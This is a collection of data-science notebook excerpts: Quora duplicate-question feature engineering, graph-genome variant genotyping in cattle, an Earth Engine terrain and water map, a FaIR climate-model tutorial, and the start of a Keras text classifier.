gr_feats['ff1'] = ff1 gr_feats['ff2'] = ff2 gr_feats['ff1m'] = ff1m gr_feats['ff2m'] = ff2m test_c = count_encode(turkewitz_feats, ['q1_freq', 'q2_freq']) test_c.q1_freq = test_c.q1_freq / np.max(test_c.q1_freq) test_c.q2_freq = test_c.q2_freq / np.max(test_c.q2_freq) test_c.rename(columns = {'q1_freq': 'q1_freq_normalized', 'q2_freq': 'q2_freq_normalized'}, inplace = True) src = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/scripts/features/' network_feats = pd.read_csv(src + 'test_networkfeats_fullclean.csv') textacy1_feats = pd.read_csv(src + 'test_textacy_similarity_feats.csv') new_feats = pd.concat([test_c, gr_feats, network_feats, textacy1_feats, turkewitz_feats], axis = 1) new_feats['q1_deg_by_freq'] = new_feats.groupby(['q1_freq'])['q1_degrees'].transform('mean') new_feats['q2_deg_by_freq'] = new_feats.groupby(['q2_freq'])['q2_degrees'].transform('mean') new_feats['q1_deg_by_freq2'] = new_feats.groupby(['q1_freq'])['q2_degrees'].transform('mean') new_feats['q2_deg_by_freq1'] = new_feats.groupby(['q2_freq'])['q1_degrees'].transform('mean') new_feats['q1_clust_by_freq'] = new_feats.groupby(['q1_freq'])['q1_cluster'].transform('mean') new_feats['q2_clust_by_freq'] = new_feats.groupby(['q2_freq'])['q2_cluster'].transform('mean') new_feats['q1_clust_by_freq2'] = new_feats.groupby(['q1_freq'])['q2_cluster'].transform('mean') new_feats['q2_clust_by_freq1'] = new_feats.groupby(['q2_freq'])['q1_cluster'].transform('mean') new_feats['q1_deg_by_freq_inv'] = new_feats.groupby(['q1_degrees'])['q1_freq'].transform('mean') new_feats['q2_deg_by_freq_inv'] = new_feats.groupby(['q2_degrees'])['q2_freq'].transform('mean') new_feats['q1_deg_by_freq2_inv'] = new_feats.groupby(['q2_degrees'])['q1_freq'].transform('mean') new_feats['q2_deg_by_freq1_inv'] = new_feats.groupby(['q1_degrees'])['q2_freq'].transform('mean') new_feats['q1_clust_by_freq_inv'] = new_feats.groupby(['q1_cluster'])['q1_freq'].transform('mean') new_feats['q2_clust_by_freq_inv'] = 
new_feats.groupby(['q2_cluster'])['q2_freq'].transform('mean') new_feats['q1_clust_by_freq2_inv'] = new_feats.groupby(['q2_cluster'])['q1_freq'].transform('mean') new_feats['q2_clust_by_freq1_inv'] = new_feats.groupby(['q1_cluster'])['q2_freq'].transform('mean') new_feats.drop(turkewitz_feats.columns.tolist(), axis = 1, inplace = True) del test_c, gr_feats, network_feats, textacy1_feats, turkewitz_feats gc.collect() return new_feats src = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/scripts/features/' X_test = get_test() new_feats = get_new_feats() networks_tony = pd.read_pickle(src + 'test_fullnetworkfeatsTony.pkl') networks_weighted = pd.read_pickle(src + 'test_networkfeats_weighted.pkl') col_dict = { 'q1_cluster': 'q1_cluster_tony', 'q1_degrees': 'q1_degrees_tony', 'q1_squared_cluster': 'q1_squared_cluster_tony', 'q1_triangles_cluster': 'q1_triangles_cluster_tony', 'q2_cluster': 'q2_cluster_tony', 'q2_degrees': 'q2_degrees_tony', 'q2_squared_cluster': 'q2_squared_cluster_tony', 'q2_triangles_cluster': 'q2_triangles_cluster_tony' } networks_tony.rename(columns = col_dict, inplace = True) cv_svd50_dist = pd.read_csv(src + 'test_SVD_CV1gram_50dim.csv') cv_lsa50_dist = pd.read_csv(src + 'test_LSA_CV1gram_50dim.csv') tfidf_svd50_dist = pd.read_csv(src + 'test_SVD_TFIDF_3grams_words_50dim.csv') tfidf_lsa50_dist = pd.read_csv(src + 'test_LSA_TFIDF_3grams_words_50dim.csv') d2v_pre = pd.read_csv(src + 'test_doc2vec_pretrained_distances.csv') d2v_quora = pd.read_csv(src + 'test_doc2vec_quoratrain_distances.csv') transforms = pd.read_csv(src + 'test_SVDLSA_CV1gram_distances.csv') X_test = pd.concat([X_test, new_feats, networks_tony, networks_weighted, cv_svd50_dist, cv_lsa50_dist, tfidf_svd50_dist, tfidf_lsa50_dist, d2v_pre, d2v_quora, transforms], axis = 1) cols_to_drop = ['counts_max_network_weighted', 'counts_min_network_weighted', 'diff_counts_network_weighted', 'diff_degrees_network_weighted', 'diff_triangles_cluster_network_weighted', 
'exactly_same', 'jaccard_distance_test_LSA_TFIDF_3grams_words_50dim', 'max_degrees_network_weighted', 'max_triangles_cluster_network_weighted', 'min_degrees_network_weighted', 'min_triangles_cluster_network_weighted', 'mult_counts_network_weighted', 'q1_counts_network_weighted', 'q1_degrees_network_weighted', 'q1_triangles_cluster_network_weighted', 'q2_counts_network_weighted', 'q2_degrees_network_weighted', 'q2_triangles_cluster_network_weighted', 'question1_100', 'question1_101', 'question1_102', 'question1_103', 'question1_104', 'question1_105', 'question1_106', 'question1_107', 'question1_108', 'question1_109', 'question1_110', 'question1_111', 'question1_112', 'question1_113', 'question1_114', 'question1_115', 'question1_116', 'question1_117', 'question1_118', 'question1_119', 'question1_120', 'question1_121', 'question1_122', 'question1_123', 'question1_124', 'question1_125', 'question1_126', 'question1_127', 'question1_68', 'question1_69', 'question1_70', 'question1_71', 'question1_72', 'question1_73', 'question1_74', 'question1_75', 'question1_76', 'question1_77', 'question1_78', 'question1_79', 'question1_80', 'question1_81', 'question1_82', 'question1_83', 'question1_84', 'question1_85', 'question1_86', 'question1_87', 'question1_88', 'question1_89', 'question1_90', 'question1_91', 'question1_92', 'question1_93', 'question1_94', 'question1_95', 'question1_96', 'question1_97', 'question1_98', 'question1_99', 'question2_103', 'question2_104', 'question2_106', 'question2_108', 'question2_109', 'question2_110', 'question2_112', 'question2_113', 'question2_114', 'question2_115', 'question2_116', 'question2_118', 'question2_119', 'question2_120', 'question2_121', 'question2_122', 'question2_123', 'question2_126', 'question2_127', 'question2_81', 'question2_83', 'question2_87', 'question2_88', 'question2_89', 'question2_96', 'sum_counts_network_weighted', 'sum_degrees_network_weighted', 'sum_triangles_cluster_network_weighted'] X_test.drop(cols_to_drop, axis = 
1, inplace = True) X_test = X_test.astype('float32') print('Final shape:', X_test.shape) X_test.to_pickle('Xtest_916cols.pkl') del new_feats, networks_tony, networks_weighted, cv_svd50_dist, cv_lsa50_dist, \ tfidf_svd50_dist, tfidf_lsa50_dist, d2v_pre, d2v_quora, transforms gc.collect() X_test = pd.read_pickle('Xtest_500bestCols.pkl') predict_test(X_test, 'XGB_new_NetworkFeats_experiments_500feats') ```
github_jupyter
### Part 4: Variant genotyping from whole genome graphs In this part, we constructed whole genome graphs for the Brown Swiss population by augmenting ~14.1 M autosomal variants identified from 82 Brown Swiss animals onto the Bovine UCD1.2 Hereford reference. We then mapped 10 samples (not used for simulation) to this whole genome graph. We then compared this with mapping to the linear genome using bwa or vg (empty graphs, i.e. only the backbone without variations). ``` library(tidyverse) library(magrittr) ``` ### Comparison between unique and perfect mapping Since reads were not simulated, we could not assess the mapping correctness. Instead, we followed the previous approaches of Novak et al. (2017) and Pritt et al. (2018) to calculate the reads that map perfectly (edit distance 0 without clipping) and the reads that map uniquely, meaning that there is only a single mapping location, or a considerably high MQ (MQ=60) in the case of multi-mapping. ``` datunper <- read.table("../result/datuniqperf.tsv",header=TRUE) head(datunper) #since the data is per chromosome, then we combined across datunper_sum <- datunper %>% group_by(anims,mapper) %>% summarise(perfect=sum(perfect)*100/sum(mapped), uniq=sum(uniq)*100/sum(mapped)) options(repr.plot.width=8, repr.plot.height=8) datunper_sum %<>% mutate(Mapping=case_when(mapper=="bwa"~"Linear (BWA)", mapper=="vg_linear"~"Linear (VG)", mapper=="vg_graph"~ "Graph (VG)")) ggplot(datunper_sum,aes(x=uniq,y=perfect,col=Mapping,shape=Mapping)) + geom_point(size=5,stroke=1)+ scale_color_manual(values=c("#E69F00", "#56B4E9", "#009E73"))+ scale_shape_manual(values=c(1,2,3))+ theme_bw()+ labs(x="Unique alignment (%)",y="Perfect alignment (%)",fill="Alignment")+ coord_cartesian(xlim = c(80,85))+ theme(text=element_text(size=18), axis.title = element_text(face="bold"), legend.position = "bottom") ``` ### Quantify the difference across mapping scenarios ``` ## The largest improvement is in the perfect mapping to the paths in the graphs ## We need to quantify this datperf <- datunper_sum %>% 
select(anims,perfect,mapper) %>% pivot_wider(names_from = mapper,values_from = perfect) %>% mutate(dif=vg_graph-bwa) cat("Maximum improvement in perfect mapping in the graph alignment from linear BWA") max(datperf$dif) cat("Minimum improvement in perfect mapping in the graph alignment from linear BWA") min(datperf$dif) cat("Mean improvement in perfect mapping in the graph alignment from linear BWA") mean(datperf$dif) ## However we noticed that the unique mapping is decreased (but very small) in graph alignments datuniq <- datunper_sum %>% select(anims,uniq,mapper) %>% pivot_wider(names_from = mapper,values_from = uniq) %>% mutate(dif=vg_graph-bwa) cat("Minimum decreased in uniq mapping in the graph alignment from linear BWA") max(datuniq$dif) cat("Maximum decreased in uniq mapping in the graph alignment from linear BWA") min(datuniq$dif) cat("Mean decreased in uniq mapping in the graph alignment from linear BWA") mean(datuniq$dif) ``` ### Comparison of the genotypes discovered from linear vs graph alignments We then surjected the graph alignment to the corresponding linear coordinates. We then used the samtools multi-sample calling to call variants. Finally, we compared with the matched SNP array to calculate concordance statistics as below. 
![Concordance statistics](concor_stat.png) ``` ## Statistics of concordance for samtools ## Mode indicate the mapping mode, bwa, graph, or vg(linear) ## Fil indicate the filtered or raw genotypes datsam <- read.table("../result/samtools_concordance_all.tsv",header=TRUE) %>% select(-prog) head(datsam) ## Since the statistics calculated based on each animals, ## We take mean and sd to report the performance of each caller datsam %>% group_by(mode) %>% summarise(m_concor=mean(concor), sd_concor=sd(concor), m_recall=mean(recal), sd_recall=sd(recal), m_discre=mean(discre), sd_discre=sd(discre), m_precision=mean(precision), sd_precision=sd(precision)) %>% as.data.frame() ``` There is almost no difference among tools; we can plot it to see the pattern more clearly. ### Plot of the genotype concordance across sequencing depth We test whether there is any difference across sequencing coverage between graph and linear alignment. ``` options(warn=-1) datcov <- read.table("../result/anims_coverage.tsv",header=FALSE) colnames(datcov) <- c("anims","coverage") datsamall <- datsam %>% left_join(datcov,by=c("anims")) head(datsamall) datfil <- datsamall %>% filter(! str_detect(mode,"_fil")) datfil %<>% mutate(Mapping=case_when(mode=="bwa"~"Linear(BWA)", mode=="graph"~"Graph(VG)", mode=="linear"~"Linear(VG)")) ggplot(datfil,aes(x=as.double(as.character(coverage)),y=concor,col=Mapping,shape=Mapping))+ geom_point(size=5,stroke=1)+ scale_y_continuous(breaks=seq(90,100,1),limits = c(96,100))+ scale_colour_manual(values=c("#E69F00", "#56B4E9", "#009E73","red"))+ scale_shape_manual(values=c(1,2,3))+ theme_bw()+ theme(text = element_text(size=18), axis.title=element_text(face="bold"), legend.position = "bottom")+ labs(x="Sequencing coverage",y="Genotype concordance") ``` ### Plot of the relation between precision and recall of the array genotypes We see no noticeable difference across sequencing coverage. We could also look into the relation between precision and recall in different samples. 
``` ggplot(datfil,aes(x=precision,y=recal,shape=Mapping,col=Mapping))+ geom_point(size=5,stroke=1)+ theme_bw()+ theme(legend.position = "bottom", text = element_text(size=18), axis.title=element_text(face="bold"))+ scale_colour_manual(values=c("#E69F00", "#56B4E9", "#009E73"))+ scale_shape_manual(values=c(1,2,3))+ labs(x="Precision(%)",y="Recall(%)") ``` ### Genotyping concordance for variants discovered from GATK and Graphtyper We additionally discovered and genotyped variants using GATK and Graphtyper, using the pipeline we established in our previous paper. We want to see whether there is any difference when using different variant callers. ``` datgatk <- read.table("../result/gatk4_concordance_all.tsv",header=TRUE) %>% select(-prog) head(datgatk) datgatk %>% group_by(mode) %>% summarise(m_concor=mean(concor), sd_concor=sd(concor), m_recall=mean(recal), sd_recall=sd(recal), m_discre=mean(discre), sd_discre=sd(discre), m_precision=mean(precision), sd_precision=sd(precision)) %>% as.data.frame() ``` Again we see only a small difference; the concordance in graph alignments even becomes slightly lower when variants are called with GATK. What about genotypes from Graphtyper? ``` datgraph <- read.table("../result/graphtyper_concordance_all.tsv",header=TRUE) head(datgraph) datgraph %>% group_by(mode,prog) %>% summarise(m_concor=mean(concor), sd_concor=sd(concor), m_recall=mean(recal), sd_recall=sd(recal), m_discre=mean(discre), sd_discre=sd(discre), m_precision=mean(precision), sd_precision=sd(precision)) %>% as.data.frame() ``` Again we see the same pattern; interestingly, we observed that concordance from *Graphtyper* is higher than from *Samtools* or *GATK*. ``` sessionInfo() ```
github_jupyter
<table class="ee-notebook-buttons" align="left"> <td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/Gena/hillshade_and_water.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td> <td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Gena/hillshade_and_water.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td> <td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=Gena/hillshade_and_water.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td> <td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Gena/hillshade_and_water.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td> </table> ## Install Earth Engine API Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`. The magic command `%%capture` can be used to hide output from a specific cell. ``` # %%capture # !pip install earthengine-api # !pip install geehydro ``` Import libraries ``` import ee import folium import geehydro ``` Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once. Uncomment the line `ee.Authenticate()` if you are running this notebook for this first time or if you are getting an authentication error. 
``` # ee.Authenticate() ee.Initialize() ``` ## Create an interactive map This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function. The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`. ``` Map = folium.Map(location=[40, -100], zoom_start=4) Map.setOptions('HYBRID') ``` ## Add Earth Engine Python script ``` from ee_plugin.contrib import palettes dem = ee.Image("JAXA/ALOS/AW3D30_V1_1").select('MED') dem = dem.updateMask(dem.gt(0)) palette = palettes.cb['Pastel1'][7] #palette = ['black', 'white'] rgb = dem.visualize(**{'min': 0, 'max': 5000, 'palette': palette }) hsv = rgb.unitScale(0, 255).rgbToHsv() extrusion = 30 weight = 0.7 hs = ee.Terrain.hillshade(dem.multiply(extrusion), 315, 35).unitScale(10, 250).resample('bicubic') hs = hs.multiply(weight).add(hsv.select('value').multiply(1 - weight)) hsv = hsv.addBands(hs.rename('value'), ['value'], True) rgb = hsv.hsvToRgb() Map.addLayer(rgb, {}, 'ALOS DEM', True, 0.5) water_occurrence = ( ee.Image("JRC/GSW1_0/GlobalSurfaceWater") .select('occurrence') .divide(100) .unmask(0) .resample('bicubic') ) palette = ["ffffcc","ffeda0","fed976","feb24c","fd8d3c","fc4e2a","e31a1c","bd0026","800026"][::-1][1:] land = ee.Image("users/gena/land_polygons_image").mask() Map.addLayer(water_occurrence.mask(water_occurrence.multiply(2).multiply(land)), {'min': 0, 'max': 1, 'palette': palette}, 'water occurrence', True) ``` ## Display Earth Engine data layers ``` Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True) Map ```
github_jupyter
# FaIR This notebook gives some simple examples of how to run and use the Finite Amplitude Impulse Response (FaIR) model. The Finite Amplitude Impulse Response (FaIR) model is a simple emissions-based climate model. It allows the user to input emissions of greenhouse gases and short lived climate forcers in order to estimate global mean atmospheric GHG concentrations, radiative forcing and temperature anomalies. The original FaIR model (v1.0) was developed to simulate the earth system response to CO$_2$ emissions, with all non-CO$_2$ forcing implemented as an "external" source. It was developed by Richard Millar, Zebedee Nicholls, Pierre Friedlingstein and Myles Allen. The motivation for developing it and its formulation is documented in a paper published in Atmospheric Chemistry and Physics in 2017 (doi:10.5194/acp-2016-405). The emissions-based model extends FaIR by replacing all sources of non-CO$_2$ forcing with relationships that are based on the source emissions, with the exception of natural forcings (viz. variations in solar irradiance and volcanic eruptions). It is more useful for assessing future policy commitments to anthropogenic emissions (something which we can control) than to radiative forcing (something which is less certain and which we can only partially control). The emissions-based model was developed by Chris Smith with input from Piers Forster, Leighton Regayre and Giovanni Passerello, in parallel with Nicolas Leach, Richard Millar and Myles Allen. ``` %matplotlib inline import fair import numpy as np from matplotlib import pyplot as plt plt.style.use('seaborn-darkgrid') plt.rcParams['figure.figsize'] = (16, 9) ``` ## Basic run Here we show how FaIR can be run with step change CO$_2$ emissions and sinusoidal non-CO$_2$ forcing timeseries. 
``` emissions = np.zeros(250) emissions[125:] = 10.0 other_rf = np.zeros(emissions.size) for x in range(0, emissions.size): other_rf[x] = 0.5 * np.sin(2 * np.pi * (x) / 14.0) C,F,T = fair.forward.fair_scm( emissions=emissions, other_rf=other_rf, useMultigas=False ) fig = plt.figure() ax1 = fig.add_subplot(221) ax1.plot(range(0, emissions.size), emissions, color='black') ax1.set_ylabel('Emissions (GtC)') ax2 = fig.add_subplot(222) ax2.plot(range(0, emissions.size), C, color='blue') ax2.set_ylabel('CO$_2$ concentrations (ppm)') ax3 = fig.add_subplot(223) ax3.plot(range(0, emissions.size), other_rf, color='orange') ax3.set_ylabel('Other radiative forcing (W.m$^{-2}$)') ax4 = fig.add_subplot(224) ax4.plot(range(0, emissions.size), T, color='red') ax4.set_ylabel('Temperature anomaly (K)'); ``` ## RCPs We can run FaIR with the CO$_2$ emissions and non-CO$_2$ forcing from the four representative concentration pathway scenarios. To use the emissions-based version specify ```useMultigas=True``` in the call to ```fair_scm()```. By default in multi-gas mode, volcanic and solar forcing plus natural emissions of methane and nitrous oxide are switched on. 
``` from fair.RCPs import rcp3pd, rcp45, rcp6, rcp85 fig = plt.figure() ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) C26, F26, T26 = fair.forward.fair_scm(emissions=rcp3pd.Emissions.emissions) ax1.plot(rcp3pd.Emissions.year, rcp3pd.Emissions.co2_fossil, color='green', label='RCP3PD') ax2.plot(rcp3pd.Emissions.year, C26[:, 0], color='green') ax3.plot(rcp3pd.Emissions.year, np.sum(F26, axis=1), color='green') ax4.plot(rcp3pd.Emissions.year, T26, color='green') C45, F45, T45 = fair.forward.fair_scm(emissions=rcp45.Emissions.emissions) ax1.plot(rcp45.Emissions.year, rcp45.Emissions.co2_fossil, color='blue', label='RCP4.5') ax2.plot(rcp45.Emissions.year, C45[:, 0], color='blue') ax3.plot(rcp45.Emissions.year, np.sum(F45, axis=1), color='blue') ax4.plot(rcp45.Emissions.year, T45, color='blue') C60, F60, T60 = fair.forward.fair_scm(emissions=rcp6.Emissions.emissions) ax1.plot(rcp6.Emissions.year, rcp6.Emissions.co2_fossil, color='red', label='RCP6') ax2.plot(rcp6.Emissions.year, C60[:, 0], color='red') ax3.plot(rcp6.Emissions.year, np.sum(F60, axis=1), color='red') ax4.plot(rcp6.Emissions.year, T60, color='red') C85, F85, T85 = fair.forward.fair_scm(emissions=rcp85.Emissions.emissions) ax1.plot(rcp85.Emissions.year, rcp85.Emissions.co2_fossil, color='black', label='RCP8.5') ax2.plot(rcp85.Emissions.year, C85[:, 0], color='black') ax3.plot(rcp85.Emissions.year, np.sum(F85, axis=1), color='black') ax4.plot(rcp85.Emissions.year, T85, color='black') ax1.set_ylabel('Fossil CO$_2$ Emissions (GtC)') ax1.legend() ax2.set_ylabel('CO$_2$ concentrations (ppm)') ax3.set_ylabel('Total radiative forcing (W.m$^{-2}$)') ax4.set_ylabel('Temperature anomaly (K)'); ``` ## Concentrations of well-mixed greenhouse gases The output of FaIR (in most cases) is a 3-element tuple of concentrations, effective radiative forcing and temperature change since pre-industrial. Concentrations are a 31-column array of greenhouse gases. 
The indices correspond to the order given in the RCP concentration datasets (table 2 in Smith et al., https://www.geosci-model-dev-discuss.net/gmd-2017-266/). We can investigate the GHG concentrations coming out of the model: ``` fig = plt.figure() ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) ax1.plot(rcp3pd.Emissions.year, C26[:,1], color='green', label='RCP3PD') ax1.plot(rcp45.Emissions.year, C45[:,1], color='blue', label='RCP4.5') ax1.plot(rcp6.Emissions.year, C60[:,1], color='red', label='RCP6') ax1.plot(rcp85.Emissions.year, C85[:,1], color='black', label='RCP8.5') ax1.set_title("Methane concentrations, ppb") ax2.plot(rcp3pd.Emissions.year, C26[:,2], color='green', label='RCP3PD') ax2.plot(rcp45.Emissions.year, C45[:,2], color='blue', label='RCP4.5') ax2.plot(rcp6.Emissions.year, C60[:,2], color='red', label='RCP6') ax2.plot(rcp85.Emissions.year, C85[:,2], color='black', label='RCP8.5') ax2.set_title("Nitrous oxide concentrations, ppb") # How to convert the H and F gases to single-species equivalents? Weight by radiative efficiency. 
from fair.constants import radeff C26_hfc134a_eq = np.sum(C26[:,3:15]*radeff.aslist[3:15],axis=1)/radeff.HFC134A # indices 3:15 are HFCs and PFCs C45_hfc134a_eq = np.sum(C45[:,3:15]*radeff.aslist[3:15],axis=1)/radeff.HFC134A C60_hfc134a_eq = np.sum(C60[:,3:15]*radeff.aslist[3:15],axis=1)/radeff.HFC134A C85_hfc134a_eq = np.sum(C85[:,3:15]*radeff.aslist[3:15],axis=1)/radeff.HFC134A C26_cfc12_eq = np.sum(C26[:,15:31]*radeff.aslist[15:31],axis=1)/radeff.CFC12 # indices 15:31 are ozone depleters C45_cfc12_eq = np.sum(C45[:,15:31]*radeff.aslist[15:31],axis=1)/radeff.CFC12 C60_cfc12_eq = np.sum(C60[:,15:31]*radeff.aslist[15:31],axis=1)/radeff.CFC12 C85_cfc12_eq = np.sum(C85[:,15:31]*radeff.aslist[15:31],axis=1)/radeff.CFC12 ax3.plot(rcp3pd.Emissions.year, C26_hfc134a_eq, color='green', label='RCP3PD') ax3.plot(rcp45.Emissions.year, C45_hfc134a_eq, color='blue', label='RCP4.5') ax3.plot(rcp6.Emissions.year, C60_hfc134a_eq, color='red', label='RCP6') ax3.plot(rcp85.Emissions.year, C85_hfc134a_eq, color='black', label='RCP8.5') ax3.set_title("HFC134a equivalent concentrations, ppt") ax4.plot(rcp3pd.Emissions.year, C26_cfc12_eq, color='green', label='RCP3PD') ax4.plot(rcp45.Emissions.year, C45_cfc12_eq, color='blue', label='RCP4.5') ax4.plot(rcp6.Emissions.year, C60_cfc12_eq, color='red', label='RCP6') ax4.plot(rcp85.Emissions.year, C85_cfc12_eq, color='black', label='RCP8.5') ax4.set_title("CFC12 equivalent concentrations, ppt") ax1.legend() ``` ## Radiative forcing We consider 13 separate species of radiative forcing: CO$_2$, CH$_4$, N$_2$O, minor GHGs, tropospheric ozone, stratospheric ozone, stratospheric water vapour from methane oxidation, contrails, aerosols, black carbon on snow, land use change, volcanic and solar (table 3 in Smith et al., https://www.geosci-model-dev.net/11/2273/2018/gmd-11-2273-2018.pdf). Here we show some of the more interesting examples. 
``` fig = plt.figure() ax1 = fig.add_subplot(221) ax2 = fig.add_subplot(222) ax3 = fig.add_subplot(223) ax4 = fig.add_subplot(224) ax1.plot(rcp3pd.Emissions.year, F26[:,4], color='green', label='RCP3PD') ax1.plot(rcp45.Emissions.year, F45[:,4], color='blue', label='RCP4.5') ax1.plot(rcp6.Emissions.year, F60[:,4], color='red', label='RCP6') ax1.plot(rcp85.Emissions.year, F85[:,4], color='black', label='RCP8.5') ax1.set_title("Tropospheric ozone forcing, W m$^{-2}$") ax2.plot(rcp3pd.Emissions.year, F26[:,5], color='green', label='RCP3PD') ax2.plot(rcp45.Emissions.year, F45[:,5], color='blue', label='RCP4.5') ax2.plot(rcp6.Emissions.year, F60[:,5], color='red', label='RCP6') ax2.plot(rcp85.Emissions.year, F85[:,5], color='black', label='RCP8.5') ax2.set_title("Stratospheric ozone forcing, W m$^{-2}$") ax3.plot(rcp3pd.Emissions.year, F26[:,8], color='green', label='RCP3PD') ax3.plot(rcp45.Emissions.year, F45[:,8], color='blue', label='RCP4.5') ax3.plot(rcp6.Emissions.year, F60[:,8], color='red', label='RCP6') ax3.plot(rcp85.Emissions.year, F85[:,8], color='black', label='RCP8.5') ax3.set_title("Aerosol forcing, W ~m$^{-2}$") ax4.plot(rcp3pd.Emissions.year, F26[:,10], color='green', label='RCP3PD') ax4.plot(rcp45.Emissions.year, F45[:,10], color='blue', label='RCP4.5') ax4.plot(rcp6.Emissions.year, F60[:,10], color='red', label='RCP6') ax4.plot(rcp85.Emissions.year, F85[:,10], color='black', label='RCP8.5') ax4.set_title("Land use forcing, W m$^{-2}$") ax1.legend(); ``` ## Ensemble generation An advantage of FaIR is that it is very quick to run (much less than a second on an average machine). Therefore it can be used to generate probabilistic future ensembles. We'll show a 100-member ensemble. 
``` from scipy import stats from fair.tools.ensemble import tcrecs_generate # generate some joint lognormal TCR and ECS pairs tcrecs = tcrecs_generate(n=100, seed=38571) # generate some forcing scale factors with SD of 10% of the best estimate F_scale = stats.norm.rvs(size=(100,13), loc=1, scale=0.1, random_state=40000) # do the same for the carbon cycle parameters r0 = stats.norm.rvs(size=100, loc=35, scale=3.5, random_state=41000) rc = stats.norm.rvs(size=100, loc=0.019, scale=0.0019, random_state=42000) rt = stats.norm.rvs(size=100, loc=4.165, scale=0.4165, random_state=45000) T = np.zeros((736,100)) %%time for i in range(100): _, _, T[:,i] = fair.forward.fair_scm(emissions=rcp85.Emissions.emissions, r0 = r0[i], rc = rc[i], rt = rt[i], tcrecs = tcrecs[i,:], scale = F_scale[i,:], F2x = 3.74*F_scale[i,0]) # scale F2x with the CO2 scaling factor for consistency fig = plt.figure() ax1 = fig.add_subplot(111) ax1.plot(rcp85.Emissions.year, T); ``` The resulting projections show a large spread. Some of these ensemble members are unrealistic, ranging from around 0.4 to 2.0 K temperature change in the present day, whereas we know in reality it is more like 0.9 (plus or minus 0.2). Therefore we can constrain this ensemble to observations. ``` try: # For Python 3.0 and later from urllib.request import urlopen except ImportError: # Fall back to Python 2's urllib2 from urllib2 import urlopen from fair.tools.constrain import hist_temp # load up Cowtan and Way data remotely url = 'http://www-users.york.ac.uk/~kdc3/papers/coverage2013/had4_krig_annual_v2_0_0.txt' response = urlopen(url) CW = np.loadtxt(response) constrained = np.zeros(100, dtype=bool) for i in range(100): # we use observed trend from 1880 to 2016 constrained[i], _, _, _, _ = hist_temp(CW[30:167,1], T[1880-1765:2017-1765,i], CW[30:167,0]) # How many ensemble members passed the constraint? print('%d ensemble members passed historical constraint' % np.sum(constrained)) # What does this do to the ensemble? 
fig = plt.figure() ax1 = fig.add_subplot(111) ax1.plot(rcp85.Emissions.year, T[:,constrained]); ``` Some, but not all, of the higher end scenarios have been constrained out, but there is still quite a large range of total temperature change projected for 2500 even under this constraint. From these constraints it is possible to obtain posterior distributions on effective radiative forcing, ECS, TCR, TCRE and other metrics.
github_jupyter
The datasets used here are taken from [this](https://github.com/Nilabhra/kolkata_nlp_workshop_2019) repository. ``` import pandas as pd train = pd.read_csv('https://raw.githubusercontent.com/Nilabhra/kolkata_nlp_workshop_2019/master/data/train.csv') validation = pd.read_csv('https://raw.githubusercontent.com/Nilabhra/kolkata_nlp_workshop_2019/master/data/valid.csv') test = pd.read_csv('https://raw.githubusercontent.com/Nilabhra/kolkata_nlp_workshop_2019/master/data/test.csv') train.shape, validation.shape, test.shape train.head() validation.head() test.head() train['text'].loc[0] ``` ### Removing digits for the text ``` from string import digits def remove_digits(s): remove_digits = str.maketrans('', '', digits) res = s.translate(remove_digits) return res train['text'] = train['text'].apply(remove_digits) validation['text'] = validation['text'].apply(remove_digits) ``` ### Bag of words representation ``` from sklearn.feature_extraction.text import CountVectorizer vectorizer = CountVectorizer(stop_words=None, lowercase=True, ngram_range=(1, 1), min_df=2, binary=True) train_features = vectorizer.fit_transform(train['text']) train_labels = train['class'] valid_features = vectorizer.transform(validation['text']) valid_labels = validation['class'] ``` ### Label encode the classes ``` from sklearn.preprocessing import LabelEncoder le = LabelEncoder() train_labels = le.fit_transform(train_labels) valid_labels = le.transform(valid_labels) ``` ### Model building and compilation ``` import tensorflow as tf from tensorflow import keras from tensorflow.keras.layers import Dropout, Dense model = keras.Sequential() model.add(Dropout(rate=0.2, input_shape=train_features.shape[1:])) for _ in range(2): model.add(Dense(units=64, activation='relu')) model.add(Dropout(rate=0.2)) model.add(Dense(units=1, activation='sigmoid')) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc']) # Define an EarlyStopping callback es_cb = 
